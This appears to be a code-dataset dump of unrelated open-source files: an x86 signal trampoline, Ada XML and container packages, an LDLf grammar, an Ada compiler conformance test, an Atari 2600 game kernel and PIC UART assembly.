max_stars_repo_path
stringlengths
4
261
max_stars_repo_name
stringlengths
6
106
max_stars_count
int64
0
38.8k
id
stringlengths
1
6
text
stringlengths
7
1.05M
kern/i686/tasking/signal_trampoline.asm
greck2908/LudOS
44
16563
<filename>kern/i686/tasking/signal_trampoline.asm<gh_stars>10-100 global signal_trampoline global signal_trampoline_info %include "defs.asm" align 0x1000 signal_trampoline: cld ; clear direction flag before entering signal handler mov ebp, esp and esp, -16 ; align the stack to a 16B boundary ; test dword [ebp+0x10], 0x4 ; test for SA_SIGINFO ; jmp siginfo_path ;no_siginfo_path: ; sub esp, 8 ; 16B boundary ; push dword [ebp] ; the signal number ; call [ebp+0xc] ; the handler ; jmp exit siginfo_path: push dword [ebp+0x14] ; ucontext* push dword [ebp+0x10] ; siginfo_t* push dword [ebp] ; the signal number call [ebp+0x4] ; the handler exit: mov eax, 0x77 int 0x80 ; call sigreturn() ud2 ; should never reach
examples/sax_events_printer/events_printers.adb
svn2github/matreshka
24
29416
<filename>examples/sax_events_printer/events_printers.adb ------------------------------------------------------------------------------ -- -- -- Matreshka Project -- -- -- -- XML Processor -- -- -- -- Examples Component -- -- -- ------------------------------------------------------------------------------ -- -- -- Copyright © 2010-2012, <NAME> <<EMAIL>> -- -- All rights reserved. -- -- -- -- Redistribution and use in source and binary forms, with or without -- -- modification, are permitted provided that the following conditions -- -- are met: -- -- -- -- * Redistributions of source code must retain the above copyright -- -- notice, this list of conditions and the following disclaimer. -- -- -- -- * Redistributions in binary form must reproduce the above copyright -- -- notice, this list of conditions and the following disclaimer in the -- -- documentation and/or other materials provided with the distribution. -- -- -- -- * Neither the name of the Vadim Godunko, IE nor the names of its -- -- contributors may be used to endorse or promote products derived from -- -- this software without specific prior written permission. -- -- -- -- THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS -- -- "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT -- -- LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR -- -- A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT -- -- HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, -- -- SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED -- -- TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR -- -- PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF -- -- LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING -- -- NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS -- -- SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. -- -- -- ------------------------------------------------------------------------------ -- $Revision$ $Date$ ------------------------------------------------------------------------------ with League.IRIs; with Put_Line; with XML.SAX.Input_Sources.Streams.Files; package body Events_Printers is use type League.Strings.Universal_String; function Image (Item : XML.SAX.Locators.SAX_Locator) return League.Strings.Universal_String; ---------------- -- Characters -- ---------------- overriding procedure Characters (Self : in out Events_Printer; Text : League.Strings.Universal_String; Success : in out Boolean) is begin Put_Line (">>> (Characters) " & Image (Self.Locator) & ": '" & Text & "'"); end Characters; ------------- -- Comment -- ------------- overriding procedure Comment (Self : in out Events_Printer; Text : League.Strings.Universal_String; Success : in out Boolean) is begin Put_Line (">>> (Comment) " & Image (Self.Locator) & ": '" & Text & "'"); end Comment; ----------------- -- End_Element -- ----------------- overriding procedure End_Element (Self : in out Events_Printer; Namespace_URI : League.Strings.Universal_String; Local_Name : League.Strings.Universal_String; Qualified_Name : League.Strings.Universal_String; Success : in out Boolean) is begin Put_Line (">>> (End_Element) " & Image (Self.Locator) & ": '" & Namespace_URI & "' '" & Local_Name & "' '" & Qualified_Name & "'"); end End_Element; ------------------------ -- End_Prefix_Mapping -- ------------------------ overriding procedure End_Prefix_Mapping (Self : in out Events_Printer; Prefix : League.Strings.Universal_String; Success : in out Boolean) is begin Put_Line (">>> (End_Prefix_Mapping) " & Image (Self.Locator) & ": '" & Prefix & "'"); end End_Prefix_Mapping; ----------- -- Error -- ----------- overriding procedure Error (Self : in out Events_Printer; Occurrence : XML.SAX.Parse_Exceptions.SAX_Parse_Exception; Success : in out Boolean) is begin Put_Line (">>> (Error) " & Image (Self.Locator) & ": '" & Occurrence.Message & "'"); end Error; ------------------ -- Error_String -- ------------------ overriding function Error_String (Self : Events_Printer) return League.Strings.Universal_String is begin return X : League.Strings.Universal_String; end Error_String; --------------------------------- -- External_Entity_Declaration -- --------------------------------- overriding procedure External_Entity_Declaration (Self : in out Events_Printer; Name : League.Strings.Universal_String; Public_Id : League.Strings.Universal_String; System_Id : League.Strings.Universal_String; Success : in out Boolean) is begin Put_Line (">>> (External_Entity_Declaration) " & Image (Self.Locator) & ": '" & Name & "' => '" & Public_Id & "' '" & System_Id & "'"); end External_Entity_Declaration; ----------------- -- Fatal_Error -- ----------------- overriding procedure Fatal_Error (Self : in out Events_Printer; Occurrence : XML.SAX.Parse_Exceptions.SAX_Parse_Exception) is begin Put_Line (">>> (Fatal_Error) " & Image (Self.Locator) & ": '" & Occurrence.Message & "'"); end Fatal_Error; -------------------------- -- Ignorable_Whitespace -- -------------------------- overriding procedure Ignorable_Whitespace (Self : in out Events_Printer; Text : League.Strings.Universal_String; Success : in out Boolean) is begin Put_Line (">>> (Ignorable_Whitespace) " & Image (Self.Locator) & ": '" & Text & "'"); end Ignorable_Whitespace; ----------- -- Image -- ----------- function Image (Item : XML.SAX.Locators.SAX_Locator) return League.Strings.Universal_String is L : constant Wide_Wide_String := Natural'Wide_Wide_Image (Item.Line); C : constant Wide_Wide_String := Natural'Wide_Wide_Image (Item.Column); begin return League.Strings.To_Universal_String (L (L'First + 1 .. L'Last) & ':' & C (C'First + 1 .. C'Last)); end Image; --------------------------------- -- Internal_Entity_Declaration -- --------------------------------- overriding procedure Internal_Entity_Declaration (Self : in out Events_Printer; Name : League.Strings.Universal_String; Value : League.Strings.Universal_String; Success : in out Boolean) is begin Put_Line (">>> (Internal_Entity_Declaration) " & Image (Self.Locator) & ": '" & Name & "' => '" & Value & "'"); end Internal_Entity_Declaration; ---------------------------- -- Processing_Instruction -- ---------------------------- overriding procedure Processing_Instruction (Self : in out Events_Printer; Target : League.Strings.Universal_String; Data : League.Strings.Universal_String; Success : in out Boolean) is begin Put_Line (">>> (Processing_Instruction) " & Image (Self.Locator) & ": '" & Target & "' '" & Data & "'"); end Processing_Instruction; -------------------- -- Resolve_Entity -- -------------------- overriding procedure Resolve_Entity (Self : in out Events_Printer; Name : League.Strings.Universal_String; Public_Id : League.Strings.Universal_String; Base_URI : League.Strings.Universal_String; System_Id : League.Strings.Universal_String; Source : out XML.SAX.Input_Sources.SAX_Input_Source_Access; Success : in out Boolean) is use XML.SAX.Input_Sources.Streams.Files; begin Source := new File_Input_Source; File_Input_Source'Class (Source.all).Open_By_URI (League.IRIs.From_Universal_String (Base_URI).Resolve (League.IRIs.From_Universal_String (System_Id)).To_Universal_String); end Resolve_Entity; -------------------------- -- Set_Document_Locator -- -------------------------- overriding procedure Set_Document_Locator (Self : in out Events_Printer; Locator : XML.SAX.Locators.SAX_Locator) is begin Self.Locator := Locator; end Set_Document_Locator; ------------------- -- Start_Element -- ------------------- overriding procedure Start_Element (Self : in out Events_Printer; Namespace_URI : League.Strings.Universal_String; Local_Name : League.Strings.Universal_String; Qualified_Name : League.Strings.Universal_String; Attributes : XML.SAX.Attributes.SAX_Attributes; Success : in out Boolean) is begin Put_Line (">>> (Start_Element) " & Image (Self.Locator) & ": '" & Namespace_URI & "' '" & Local_Name & "' '" & Qualified_Name & "'"); for J in 1 .. Attributes.Length loop Put_Line (" '" & Attributes.Namespace_URI (J) & "' '" & Attributes.Local_Name (J) & "' '" & Attributes.Qualified_Name (J) & "' '" & Attributes.Value (J) & "'"); end loop; end Start_Element; -------------------------- -- Start_Prefix_Mapping -- -------------------------- overriding procedure Start_Prefix_Mapping (Self : in out Events_Printer; Prefix : League.Strings.Universal_String; Namespace_URI : League.Strings.Universal_String; Success : in out Boolean) is begin Put_Line (">>> (Start_Prefix_Mapping) " & Image (Self.Locator) & ": '" & Prefix & "' => '" & Namespace_URI & "'"); end Start_Prefix_Mapping; --------------------------------- -- Unparsed_Entity_Declaration -- --------------------------------- overriding procedure Unparsed_Entity_Declaration (Self : in out Events_Printer; Name : League.Strings.Universal_String; Public_Id : League.Strings.Universal_String; System_Id : League.Strings.Universal_String; Notation_Name : League.Strings.Universal_String; Success : in out Boolean) is begin Put_Line (">>> (Unparsed_Entity_Declaration) " & Image (Self.Locator) & ": '" & Name & "' => '" & Public_Id & "' '" & System_Id & "' '" & Notation_Name & "'"); end Unparsed_Entity_Declaration; ------------- -- Warning -- ------------- overriding procedure Warning (Self : in out Events_Printer; Occurrence : XML.SAX.Parse_Exceptions.SAX_Parse_Exception; Success : in out Boolean) is begin Put_Line (">>> (Warning) " & Image (Self.Locator) & ": '" & Occurrence.Message & "'"); end Warning; end Events_Printers;
grammars/LDLfFormulaParser.g4
RiccardoDeMasellis/FLLOAT
9
6376
grammar LDLfFormulaParser; import PropFormulaParser; /*@parser::members{ }*/ start : expression EOF ; expression : doubleImplicationTemp ; doubleImplicationTemp : implicationTemp (DOUBLEIMPLY implicationTemp)* ; implicationTemp : orTemp (IMPLY orTemp)* ; orTemp : andTemp (OR andTemp)* ; andTemp : ldlfBox (AND ldlfBox)* ; ldlfBox : (BOXLSEPARATOR regularExpression BOXRSEPARATOR)? ldlfDiamond ; ldlfDiamond : (DIAMONDLSEPARATOR regularExpression DIAMONDRSEPARATOR)? notTemp ; notTemp : ldlfAtom | NOT? LSEPARATOR expression RSEPARATOR ; ldlfAtom : TT | FF | LAST | END | propositionalFormula ; regularExpression : alternation ; alternation : concatenation (ALTERNATION concatenation)* ; concatenation : star (CONCATENATION star)* ; star : test STAR? | LSEPARATOR regularExpression RSEPARATOR STAR? ; test : LSEPARATOR expression RSEPARATOR TEST | atom TEST | propositionalFormula | EPSILON ; LAST : ('Last')|('LAST')|('last'); EPSILON : ('eps'); TT : ('tt'); FF : ('ff'); END : ('end')|('END')|('End'); BOXLSEPARATOR : ('['); BOXRSEPARATOR : (']'); DIAMONDLSEPARATOR : ('<'); DIAMONDRSEPARATOR : ('>'); STAR : ('*'); TEST : ('?'); ALTERNATION : ('+'); CONCATENATION : (';');
gcc-gcc-7_3_0-release/gcc/testsuite/ada/acats/tests/c8/c87b42a.ada
best08618/asylo
7
16044
<filename>gcc-gcc-7_3_0-release/gcc/testsuite/ada/acats/tests/c8/c87b42a.ada<gh_stars>1-10 -- C87B42A.ADA -- Grant of Unlimited Rights -- -- Under contracts F33600-87-D-0337, F33600-84-D-0280, MDA903-79-C-0687, -- F08630-91-C-0015, and DCA100-97-D-0025, the U.S. Government obtained -- unlimited rights in the software and documentation contained herein. -- Unlimited rights are defined in DFAR 252.227-7013(a)(19). By making -- this public release, the Government intends to confer upon all -- recipients unlimited rights equal to those held by the Government. -- These rights include rights to use, duplicate, release or disclose the -- released technical data and computer software in whole or in part, in -- any manner and for any purpose whatsoever, and to have or permit others -- to do so. -- -- DISCLAIMER -- -- ALL MATERIALS OR INFORMATION HEREIN RELEASED, MADE AVAILABLE OR -- DISCLOSED ARE AS IS. THE GOVERNMENT MAKES NO EXPRESS OR IMPLIED -- WARRANTY AS TO ANY MATTER WHATSOEVER, INCLUDING THE CONDITIONS OF THE -- SOFTWARE, DOCUMENTATION OR OTHER INFORMATION RELEASED, MADE AVAILABLE -- OR DISCLOSED, OR THE OWNERSHIP, MERCHANTABILITY, OR FITNESS FOR A -- PARTICULAR PURPOSE OF SAID MATERIAL. --* -- CHECK THAT OVERLOADING RESOLUTION USES THE RULE THAT: -- -- A CONDITIONAL EXPRESSION MUST BE OF A BOOLEAN TYPE. -- TRH 27 JULY 82 -- PWN 01/31/95 REMOVED INCONSISTENCIES WITH ADA 9X. WITH REPORT; USE REPORT; PROCEDURE C87B42A IS TYPE BIT IS NEW BOOLEAN; TYPE BOOLEAN IS (FALSE, TRUE); TYPE LIT IS (FALSE, TRUE); TYPE FLAG IS (PASS, FAIL); GENERIC TYPE T IS PRIVATE; ARG : IN T; STAT : FLAG; FUNCTION F1 RETURN T; FUNCTION F1 RETURN T IS BEGIN IF STAT = FAIL THEN FAILED ("CONDITIONAL EXPRESSION MUST BE OF A BOOLEAN" & " TYPE"); END IF; RETURN ARG; END F1; FUNCTION F IS NEW F1 (BOOLEAN, FALSE, FAIL); FUNCTION F IS NEW F1 (BIT, FALSE, PASS); FUNCTION F IS NEW F1 (LIT, FALSE, FAIL); FUNCTION F IS NEW F1 (INTEGER, -11, FAIL); FUNCTION F IS NEW F1 (FLOAT, +0.0, FAIL); BEGIN TEST ("C87B42A","OVERLOADED CONDITIONAL EXPRESSIONS"); WHILE (F OR NOT F) LOOP IF (F OR ELSE NOT F) THEN NULL; END IF; EXIT WHEN (F AND NOT F); EXIT WHEN (F OR NOT F); EXIT WHEN (F); EXIT WHEN (NOT F); END LOOP; RESULT; END C87B42A;
src/main.asm
nrkn/lo-a-rad-dragon
0
19150
processor 6502 include "vcs.h" include "macro.h" ; ------------------------------------------------------------------------------ ; Setup variables ; ------------------------------------------------------------------------------ seg.u Variables org $80 PlayerX byte PlayerY byte OldX byte OldY byte Random byte ; ------------------------------------------------------------------------------ ; Setup consts ; ------------------------------------------------------------------------------ PLAYER_HEIGHT = 8 SWORD_HEIGHT = 8 SHIELD_HEIGHT = 8 BEER_HEIGHT = 8 HEAL_HEIGHT = 8 WEAPON_Y = 20 ARMOR_Y = 30 INN_Y = 40 HEALER_Y = 50 ; ------------------------------------------------------------------------------ ; Setup rom ; ------------------------------------------------------------------------------ seg code org $f000 ; define the code origin at $f000 - start of the ROM Start: CLEAN_START ; ------------------------------------------------------------------------------ ; Init Variables ; ------------------------------------------------------------------------------ lda #50 sta PlayerX sta PlayerY ; ------------------------------------------------------------------------------ ; Render ; ------------------------------------------------------------------------------ StartFrame: ; ------------------------------------------------------------------------------ ; Init VSYNC and VBLANK ; ------------------------------------------------------------------------------ lda #2 sta VBLANK sta VSYNC repeat 3 sta WSYNC repend lda #0 sta VSYNC ; turn off VSYNC ; ------------------------------------------------------------------------------ ; Calculations run before VBLANK ; ------------------------------------------------------------------------------ lda PlayerX ldy #0 jsr SetObjectXPos ; set player0 x position sta WSYNC sta HMOVE ; apply the horizontal offets we just set ; ------------------------------------------------------------------------------ ; 37 lines of VBLANK minus 2 used above ; ------------------------------------------------------------------------------ ldx #35 LoopVBlank: sta WSYNC dex bne LoopVBlank lda #0 sta VBLANK ; turn off VBLANK ; ------------------------------------------------------------------------------ ; 192 visible scanlines ; ------------------------------------------------------------------------------ ; ------------------------------------------------------------------------------ ; 2-line kernel ; ------------------------------------------------------------------------------ lda #$c6 ; background sta COLUBK ldx #96 ; scanline counter .EachLine: .IsPlayer: txa sec ; always set carry before sub sbc PlayerY cmp PLAYER_HEIGHT bcc .DrawPlayer lda #0 ; if not draw empty row from sprite .DrawPlayer: tay lda PlayerSprite,Y sta GRP0 lda PlayerColors,Y sta COLUP0 sta WSYNC .IsHealerHut: txa sec sbc HEALER_Y cmp HEAL_HEIGHT bcc .DrawHealerHut jmp .IsInnHut .DrawHealerHut: tay lda HealSprite,Y sta GRP1 lda HealColors,Y sta COLUP1 jmp .DrawHutsDone .IsInnHut: txa sec sbc INN_Y cmp BEER_HEIGHT bcc .DrawInnHut jmp .IsWeaponHut .DrawInnHut: tay lda BeerSprite,Y sta GRP1 lda BeerColors,Y sta COLUP1 jmp .DrawHutsDone .IsWeaponHut: txa sec sbc WEAPON_Y cmp SWORD_HEIGHT bcc .DrawWeaponHut jmp .IsArmorHut .DrawWeaponHut: tay lda SwordSprite,Y sta GRP1 lda SwordColors,Y sta COLUP1 jmp .DrawHutsDone .IsArmorHut: txa sec sbc ARMOR_Y cmp SHIELD_HEIGHT bcc .DrawArmorHut lda #0 .DrawArmorHut: tay lda ShieldSprite,Y sta GRP1 lda ShieldColors,Y sta COLUP1 .DrawHutsDone sta WSYNC dex bne .EachLine ; ------------------------------------------------------------------------------ ; Overscan ; ------------------------------------------------------------------------------ lda #2 sta VBLANK ldx #30 LoopOverscan: sta WSYNC dex bne LoopOverscan lda #0 sta VBLANK ; ------------------------------------------------------------------------------ ; Input handler ; ------------------------------------------------------------------------------ CheckP0Up: lda #%00010000 bit SWCHA ; compare to joy bne CheckP0Down inc PlayerY CheckP0Down: lda #%00100000 bit SWCHA bne CheckP0Left dec PlayerY CheckP0Left: lda #%01000000 bit SWCHA bne CheckP0Right dec PlayerX CheckP0Right: lda #%10000000 bit SWCHA bne EndInputCheck inc PlayerX EndInputCheck: ; ------------------------------------------------------------------------------ ; Check collisions ; ------------------------------------------------------------------------------ ; ------------------------------------------------------------------------------ ; Next frame ; ------------------------------------------------------------------------------ jmp StartFrame ; ------------------------------------------------------------------------------ ; Subroutines ; ------------------------------------------------------------------------------ ; Horizontal Positioning ; A is the desired x coordinate ; Y is the object type ; 0 = player0, 1 = player1, 2 = missile0, 3 = missile1, 4 = ball ; ------------------------------------------------------------------------------ SetObjectXPos subroutine sta WSYNC ; start new scanline sec ; ensure carry flag .Div15Loop sbc #15 ; sub 15 from desired X to get coarse location bcs .Div15Loop ; loop until carry is clear eor #7 ; put in range -8 to 7 repeat 4 ; shift left 4 times, only want top 4 bits asl repend sta HMP0,Y ; store the fine offset sta RESP0,Y ; store the coarse offset rts ; ------------------------------------------------------------------------------ ; Random using Linear-Feedback Shift Register ; - Generate random number using LFSR ; ------------------------------------------------------------------------------ SetRandom subroutine lda Random asl eor Random asl eor Random asl asl eor Random asl rol Random ; ok we have LFSR random rts ; ------------------------------------------------------------------------------ ; ROM Data ; ------------------------------------------------------------------------------ ; Bitmaps and colors ; ------------------------------------------------------------------------------ PlayerSprite: .byte #%00000000 .byte #%01001000 .byte #%11111100 .byte #%01111000 .byte #%10000000 .byte #%10101000 .byte #%10000000 .byte #%01111000 SwordSprite: .byte #%00000000 .byte #%00010000 .byte #%00111000 .byte #%00010000 .byte #%00010000 .byte #%00010000 .byte #%00010000 .byte #%00010000 ShieldSprite: .byte #%00000000 .byte #%00111000 .byte #%01111100 .byte #%01111100 .byte #%01111100 .byte #%01111100 .byte #%01010100 .byte #%00000000 BeerSprite: .byte #%00000000 .byte #%11111000 .byte #%10101100 .byte #%10101010 .byte #%10101010 .byte #%10101010 .byte #%11111100 .byte #%11111000 HealSprite: .byte #%00000000 .byte #%00110000 .byte #%00110000 .byte #%11111100 .byte #%11111100 .byte #%00110000 .byte #%00110000 .byte #%00000000 PlayerColors: .byte $00 .byte $96 .byte $96 .byte $1c .byte $1c .byte $1c .byte $1c .byte $1c SwordColors: .byte $00 .byte $06 .byte $0a .byte $0e .byte $0e .byte $0e .byte $0e .byte $0e ShieldColors: .byte $00 .byte $06 .byte $08 .byte $08 .byte $08 .byte $08 .byte $0a .byte $00 BeerColors: .byte $00 .byte $1e .byte $1e .byte $1e .byte $1f .byte $1f .byte $1f .byte $0e HealColors: .byte $00 .byte $36 .byte $36 .byte $36 .byte $38 .byte $38 .byte $38 .byte $00 ; ------------------------------------------------------------------------------ ; Fill ROM to exactly 4kb ; ------------------------------------------------------------------------------ org $fffc .word Start ; tell atari where to start when we reset .word Start ; interupt at $fffe - unused by vcs but makes 4kb
bluetooth rec/rec.asm
SREEHARIR/POV-Clock
0
11218
<filename>bluetooth rec/rec.asm _main: ;rec.c,18 :: void main() ;rec.c,21 :: TRISA=0xFF; MOVLW 255 MOVWF TRISA+0 ;rec.c,22 :: TRISB=0x00; CLRF TRISB+0 ;rec.c,23 :: PORTB=0x00; CLRF PORTB+0 ;rec.c,24 :: Lcd_Init(); CALL _Lcd_Init+0, 0 ;rec.c,25 :: TRISC.RC6 = 0x00; //TX pin set as output BCF TRISC+0, 6 ;rec.c,26 :: TRISC.RC7 = 0xFF; //RX pin set as input BSF TRISC+0, 7 ;rec.c,27 :: UART1_Init(9600); MOVLW 25 MOVWF SPBRG+0 BSF TXSTA+0, 2, 0 CALL _UART1_Init+0, 0 ;rec.c,28 :: delay_ms(100); //Dealy for UART to become stable MOVLW 130 MOVWF R12, 0 MOVLW 221 MOVWF R13, 0 L_main0: DECFSZ R13, 1, 1 BRA L_main0 DECFSZ R12, 1, 1 BRA L_main0 NOP NOP ;rec.c,31 :: UART1_Init(9600); // Initialize UART module at 9600 bps MOVLW 25 MOVWF SPBRG+0 BSF TXSTA+0, 2, 0 CALL _UART1_Init+0, 0 ;rec.c,32 :: Delay_ms(10000); // Wait for UART module to stabilize MOVLW 51 MOVWF R11, 0 MOVLW 187 MOVWF R12, 0 MOVLW 223 MOVWF R13, 0 L_main1: DECFSZ R13, 1, 1 BRA L_main1 DECFSZ R12, 1, 1 BRA L_main1 DECFSZ R11, 1, 1 BRA L_main1 NOP NOP ;rec.c,33 :: while (1) // Endless loop L_main2: ;rec.c,35 :: if (UART1_Data_Ready()) // If data is received, CALL _UART1_Data_Ready+0, 0 MOVF R0, 1 BTFSC STATUS+0, 2 GOTO L_main4 ;rec.c,37 :: for(i=0;i<100;i++) CLRF main_i_L0+0 CLRF main_i_L0+1 L_main5: MOVLW 128 XORWF main_i_L0+1, 0 MOVWF R0 MOVLW 128 SUBWF R0, 0 BTFSS STATUS+0, 2 GOTO L__main13 MOVLW 100 SUBWF main_i_L0+0, 0 L__main13: BTFSC STATUS+0, 0 GOTO L_main6 ;rec.c,39 :: uart_rd[i]= UART1_Read(); MOVLW _uart_rd+0 ADDWF main_i_L0+0, 0 MOVWF FLOC__main+0 MOVLW hi_addr(_uart_rd+0) ADDWFC main_i_L0+1, 0 MOVWF FLOC__main+1 CALL _UART1_Read+0, 0 MOVFF FLOC__main+0, FSR1L MOVFF FLOC__main+1, FSR1H MOVF R0, 0 MOVWF POSTINC1+0 ;rec.c,40 :: UART1_Write(uart_rd); MOVLW _uart_rd+0 MOVWF FARG_UART1_Write_data_+0 CALL _UART1_Write+0, 0 ;rec.c,41 :: delay_ms(1000); MOVLW 6 MOVWF R11, 0 MOVLW 19 MOVWF R12, 0 MOVLW 173 MOVWF R13, 0 L_main8: DECFSZ R13, 1, 1 BRA L_main8 DECFSZ R12, 1, 1 BRA L_main8 DECFSZ R11, 1, 1 BRA L_main8 NOP NOP ;rec.c,37 :: for(i=0;i<100;i++) INFSNZ main_i_L0+0, 1 INCF main_i_L0+1, 1 ;rec.c,42 :: } GOTO L_main5 L_main6: ;rec.c,43 :: for(i=0;i<100;i++) CLRF main_i_L0+0 CLRF main_i_L0+1 L_main9: MOVLW 128 XORWF main_i_L0+1, 0 MOVWF R0 MOVLW 128 SUBWF R0, 0 BTFSS STATUS+0, 2 GOTO L__main14 MOVLW 100 SUBWF main_i_L0+0, 0 L__main14: BTFSC STATUS+0, 0 GOTO L_main10 ;rec.c,45 :: Lcd_Cmd(_LCD_CLEAR); // Clear display MOVLW 1 MOVWF FARG_Lcd_Cmd_out_char+0 CALL _Lcd_Cmd+0, 0 ;rec.c,46 :: Lcd_Out(1,0,text); MOVLW 1 MOVWF FARG_Lcd_Out_row+0 CLRF FARG_Lcd_Out_column+0 MOVLW _text+0 MOVWF FARG_Lcd_Out_text+0 MOVLW hi_addr(_text+0) MOVWF FARG_Lcd_Out_text+1 CALL _Lcd_Out+0, 0 ;rec.c,47 :: delay_ms(10000); MOVLW 51 MOVWF R11, 0 MOVLW 187 MOVWF R12, 0 MOVLW 223 MOVWF R13, 0 L_main12: DECFSZ R13, 1, 1 BRA L_main12 DECFSZ R12, 1, 1 BRA L_main12 DECFSZ R11, 1, 1 BRA L_main12 NOP NOP ;rec.c,43 :: for(i=0;i<100;i++) INFSNZ main_i_L0+0, 1 INCF main_i_L0+1, 1 ;rec.c,48 :: } GOTO L_main9 L_main10: ;rec.c,49 :: } L_main4: ;rec.c,50 :: } GOTO L_main2 ;rec.c,51 :: } GOTO $+0 ; end of _main
Task/Define-a-primitive-data-type/Ada/define-a-primitive-data-type-2.ada
LaudateCorpus1/RosettaCodeData
1
24813
<filename>Task/Define-a-primitive-data-type/Ada/define-a-primitive-data-type-2.ada A : My_Type := 3; B : My_Type := A;
src/natools-web-containers.ads
faelys/natools-web
1
2277
------------------------------------------------------------------------------ -- Copyright (c) 2014-2019, <NAME> -- -- -- -- Permission to use, copy, modify, and distribute this software for any -- -- purpose with or without fee is hereby granted, provided that the above -- -- copyright notice and this permission notice appear in all copies. -- -- -- -- THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES -- -- WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF -- -- MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR -- -- ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES -- -- WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN -- -- ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF -- -- OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. -- ------------------------------------------------------------------------------ ------------------------------------------------------------------------------ -- Natools.Web.Containres provides common containers for all website-wide -- -- persistent data. -- ------------------------------------------------------------------------------ with Ada.Calendar.Time_Zones; with Ada.Containers.Doubly_Linked_Lists; with Ada.Containers.Indefinite_Doubly_Linked_Lists; with Ada.Streams; with Natools.Constant_Indefinite_Ordered_Maps; with Natools.References; with Natools.S_Expressions.Atom_Refs; with Natools.S_Expressions.Caches; with Natools.S_Expressions.Lockable; with Natools.Storage_Pools; package Natools.Web.Containers is type Date is record Time : Ada.Calendar.Time; Offset : Ada.Calendar.Time_Zones.Time_Offset; end record; package Date_Maps is new Constant_Indefinite_Ordered_Maps (S_Expressions.Atom, Date, S_Expressions.Less_Than); procedure Set_Dates (Map : in out Date_Maps.Constant_Map; Date_List : in out S_Expressions.Lockable.Descriptor'Class); -- (Re)initialize date database with then given list package Expression_Maps is new Constant_Indefinite_Ordered_Maps (S_Expressions.Atom, S_Expressions.Caches.Cursor, S_Expressions.Less_Than, S_Expressions.Caches."="); procedure Add_Expressions (Map : in out Expression_Maps.Constant_Map; Expression_List : in out S_Expressions.Lockable.Descriptor'Class); -- Add expressions from the given list to a database procedure Set_Expressions (Map : in out Expression_Maps.Constant_Map; Expression_List : in out S_Expressions.Lockable.Descriptor'Class); -- (Re)initialize expression database with the given list package Expression_Map_Maps is new Constant_Indefinite_Ordered_Maps (S_Expressions.Atom, Expression_Maps.Constant_Map, S_Expressions.Less_Than, Expression_Maps."="); procedure Set_Expression_Maps (Map : in out Expression_Map_Maps.Constant_Map; Expression_Map_List : in out S_Expressions.Lockable.Descriptor'Class); -- (Re)initialize expression map database with the given list type Optional_Expression (Is_Empty : Boolean := True) is record case Is_Empty is when True => null; when False => Value : S_Expressions.Caches.Cursor; end case; end record; package Unsafe_Atom_Lists is new Ada.Containers.Indefinite_Doubly_Linked_Lists (S_Expressions.Atom, Ada.Streams."="); procedure Append_Atoms (Target : in out Unsafe_Atom_Lists.List; Expression : in out S_Expressions.Lockable.Descriptor'Class); type Atom_Array is array (S_Expressions.Count range <>) of S_Expressions.Atom_Refs.Immutable_Reference; package Atom_Array_Refs is new References (Atom_Array, Storage_Pools.Access_In_Default_Pool'Storage_Pool, Storage_Pools.Access_In_Default_Pool'Storage_Pool); function Create (Source : Unsafe_Atom_Lists.List) return Atom_Array_Refs.Immutable_Reference; function Create (Expression : in out S_Expressions.Lockable.Descriptor'Class) return Atom_Array_Refs.Immutable_Reference; package Atom_Row_Lists is new Ada.Containers.Doubly_Linked_Lists (Atom_Array_Refs.Immutable_Reference, Atom_Array_Refs."="); type Atom_Table is array (S_Expressions.Offset range <>) of Atom_Array_Refs.Immutable_Reference; package Atom_Table_Refs is new References (Atom_Table, Natools.Storage_Pools.Access_In_Default_Pool'Storage_Pool, Natools.Storage_Pools.Access_In_Default_Pool'Storage_Pool); function Create (Expression : in out S_Expressions.Lockable.Descriptor'Class) return Atom_Table_Refs.Immutable_Reference; function Create (Row_List : in Atom_Row_Lists.List) return Atom_Table_Refs.Immutable_Reference; type Atom_Set is private; Null_Atom_Set : constant Atom_Set; function Create (Source : in Atom_Array) return Atom_Set; function Create (Source : in Unsafe_Atom_Lists.List) return Atom_Set; function Contains (Set : in Atom_Set; Value : in S_Expressions.Atom) return Boolean; function Contains (Set : in Atom_Set; Value : in String) return Boolean; function Elements (Set : in Atom_Set) return Atom_Array_Refs.Immutable_Reference; type Identity is record User : S_Expressions.Atom_Refs.Immutable_Reference; Groups : Atom_Set; end record; Null_Identity : constant Identity; private type Atom_Set is record Elements : Atom_Array_Refs.Immutable_Reference; end record; function Elements (Set : in Atom_Set) return Atom_Array_Refs.Immutable_Reference is (Set.Elements); Null_Atom_Set : constant Atom_Set := (Elements => Atom_Array_Refs.Null_Immutable_Reference); Null_Identity : constant Identity := (User => S_Expressions.Atom_Refs.Null_Immutable_Reference, Groups => Null_Atom_Set); end Natools.Web.Containers;
programs/oeis/179/A179064.asm
neoneye/loda
22
14755
